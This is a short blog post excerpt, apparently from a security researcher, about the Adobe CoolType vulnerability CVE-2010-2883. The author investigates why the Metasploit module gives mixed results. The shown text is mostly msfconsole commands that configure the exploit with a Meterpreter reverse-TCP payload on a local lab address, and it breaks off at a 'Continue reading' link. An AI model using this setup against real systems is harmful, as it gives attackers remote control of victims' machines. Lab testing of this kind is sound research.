New Adobe 0day – CVE-2010-2883

Having read that some folks have had mixed results with the Metasploit exploit, I decided I would try and find some reason why.

I started out by running up Metasploit and setting up the exploit

msf > use exploit/windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.0.79
LHOST => 192.168.0.79
msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.79
SRVHOST => 192.168.0.79
msf exploit(adobe_cooltype_sing) > show options

Module options:

Continue reading “New Adobe 0day – CVE-2010-2883”